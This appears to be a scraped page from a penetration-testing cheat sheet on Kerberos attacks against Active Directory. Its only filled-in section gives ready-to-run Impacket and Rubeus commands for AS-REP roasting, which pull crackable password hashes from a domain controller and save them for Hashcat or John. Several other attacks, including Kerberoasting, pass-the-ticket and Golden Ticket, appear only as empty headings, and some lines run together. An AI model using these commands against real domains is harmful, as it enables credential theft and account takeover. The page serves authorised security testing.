Kerberoast
Tools
ASREP-Roast
Impacket
# ASREP check on all domain Users (Requires valid domain credentials)
python2 GetNPUsers.py <Domain>/<User>:<Password> -request -dc-ip <IP> -format <John|Hashcat> | grep "$krb5asrep$"
# ASREP check on a list of domain user (Does not require domain credentials)
python2 GetNPUsers.py <Domain> -usersfile <UserList> -dc-ip <IP> -format <John|Hashcat> | grep "$krb5asrep$"Rubeus
# Extract from all domain accounts
.\Rubeus.exe asreproast
.\Rubeus.exe asreproast /format:hashcat /outfile:C:Hashes.txtCracking
Brute Force
Kerbrute
Rubeus
Kerberoasting
Impacket
Rubeus
Pass-The-Ticket
Mimikatz
Rubeus
PsExec
Silver Ticket
Golden Ticket
Last updated